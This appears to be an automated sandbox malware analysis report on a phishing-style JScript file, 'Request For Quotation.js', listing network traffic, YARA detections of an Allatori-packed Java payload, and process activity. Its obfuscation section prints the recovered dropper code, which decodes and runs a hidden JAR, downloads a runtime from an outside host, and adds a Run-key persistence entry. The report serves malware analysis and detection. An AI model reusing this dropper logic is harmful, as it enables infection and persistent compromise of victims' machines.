Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50054 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 50065 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50052 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown Network traffic detected: HTTP traffic on port 49925 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown Network traffic detected: HTTP traffic on port 50064 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown Network traffic detected: HTTP traffic on port 50029 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49925
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50063 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50047 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50047
Source: unknown Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50049
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50030 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50051
Source: unknown Network traffic detected: HTTP traffic on port 50044 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49781 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49782 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49784 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49788 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49819 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49822 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49821 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49823 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49852 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49856 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49855 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49857 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49887 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49890 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49891 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49895 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49925 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49928 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49927 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49933 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49958 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49961 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49962 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49969 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49997 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49998 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49999 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:50010 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50019 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50020 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50021 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:50022 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50023 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50024 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50025 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:50026 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50027 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50028 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50029 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:50030 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50031 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50032 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50033 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:50034 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50035 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50036 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50037 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:50038 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50039 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50040 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50041 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:50042 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50043 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50044 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50045 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:50046 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50047 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50049 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50048 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:50050 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50051 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50052 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50053 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:50054 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50055 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50056 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50057 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:50058 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50059 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50060 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50061 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:50062 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50063 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50064 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50065 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000002.00000002.3326043474.0000000009B95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Source: 00000002.00000002.3326043474.0000000009B63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Source: Process Memory Space: javaw.exe PID: 7100, type: MEMORYSTR Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Detected potential crypto function
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_151DA58A 2_3_151DA58A
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_151D6BB8 2_3_151D6BB8
Java / VBScript file with very long strings (likely obfuscated code)
Source: Request For Quotation.js Initial sample: Strings found which are bigger than 50
Yara signature match
Source: 00000002.00000002.3326043474.0000000009B95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
Source: 00000002.00000002.3326043474.0000000009B63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
Source: Process Memory Space: javaw.exe PID: 7100, type: MEMORYSTR Matched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
Source: classification engine Classification label: mal100.troj.evad.winJS@6/4@8/4
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\otyhtiklwj.txt Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6848:120:WilError_03
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe File created: C:\Users\user\AppData\Local\Temp\hsperfdata_user Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Request For Quotation.js Virustotal: Detection: 35%
Source: Request For Quotation.js ReversingLabs: Detection: 26%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Request For Quotation.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\otyhtiklwj.txt"
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\SysWOW64\icacls.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\otyhtiklwj.txt" Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msdart.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior

Data Obfuscation
barindex
JScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.CreateObject("WScript.Shell");var tempdir = wshShell.ExpandEnvironmentStrings("%temp%");var appdatadir = wshShell.ExpandEnvironmentStrings("%appdata%");var r = Math.random().toString(36).replace(/[^a-z]+/g, '').substr(0, 10);var stubpath = appdatadir + "\\" + r + ".txt"var decoded = decodeBase64(longText);writeBytes(stubpath, decoded);var fso = WScript.CreateObject("Scripting.FileSystemObject");var text = "";try{text = wshShell.RegRead("HKLM\\SOFTWARE\\Wow6432Node\\JavaSoft\\Java Runtime Environment\\CurrentVersion");text = wshShell.RegRead("HKLM\\SOFTWARE\\Wow6432Node\\JavaSoft\\Java Runtime Environment\\" + text + "\\JavaHome");}catch(err){}try{if(text == ""){text = wshShell.RegRead("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\CurrentVersion");text = wshShell.RegRead("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\" + text + "\\JavaHome");if(text != ""){text = text + "\\bin\\javaw.exe";}}else{text = text + "\\bin\\javaw.exe";}}catch(err){}try{if(text != ""){//wshShell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntfsmgr", "\"" + text + "\" -jar \"" + stubpath + "\"", "REG_SZ");wshShell.run("\"" + text + "\" -jar \"" + stubpath + "\"");} else{GrabJreFromNet();}} catch(err){}function GrabJreFromNet(){do{try{var xHttp = WScript.CreateObject("msxml2.serverxmlhttp.6.0");var bStrm = WScript.CreateObject("Adodb.Stream");xHttp.open("GET", "http://wshsoft.company/jv/jrex.zip", false);xHttp.setOption(2, 13056);xHttp.send();bStrm.Type = 1;bStrm.open();bStrm.write(xHttp.responseBody);bStrm.savetofile(appdatadir + "\\jre.zip", 2);break;}catch(err){WScript.Sleep(5000);}}while(true);UnZip(appdatadir + "\\jre.zip", appdatadir + "\\jre7");//wshShell.RegWrite("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\CurrentVersion", "1.8", "REG_SZ");//wshShell.RegWrite("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\1.8\\JavaHome", appdatadir + "\\jre7", "REG_SZ");wshShell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntfsmgr", "\"" + appdatadir + "\\jre7\\bin\\javaw.exe\" -jar " + "\"" + stubpath + "\"", "REG_SZ");wshShell.run("\"" + appdatadir + "\\jre7\\bin\\javaw.exe\" -jar " + "\"" + stubpath + "\"");}function decodeBase64(base64){var DM = WScript.CreateObject("Microsoft.XMLDOM");var EL = DM.createElement("tmp");EL.dataType = "bin.base64";EL.text = base64;return EL.nodeTypedValue;}function writeBytes(file, bytes){var binaryStream = WScript.CreateObject("ADODB.Stream");binaryStream.Type = 1;binaryStream.Open();binaryStream.Write(bytes);binaryStream.SaveToFile(file, 2);}function UnZip(zipfile, ExtractTo){if(fso.GetExtensionName(zipfile) == "zip"){if(!fso.FolderExists(ExtractTo)){fso.CreateFolder(ExtractTo);}var objShell = WScript.CreateObject("Shell.Application");var destination = objShell.NameSpace(ExtractTo);var zip_content = objShell.NameSpace(zipfile).Items(); for(i = 0; i < zip_content.Count; i++){if(fso.FileExists(fso.Buildpath(ExtractTo,zip_content.item(i).name)+"."+fso.getExtensionName
Yara detected AllatoriJARObfuscator
Source: Yara match File source: 00000002.00000002.3326043474.0000000009B95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
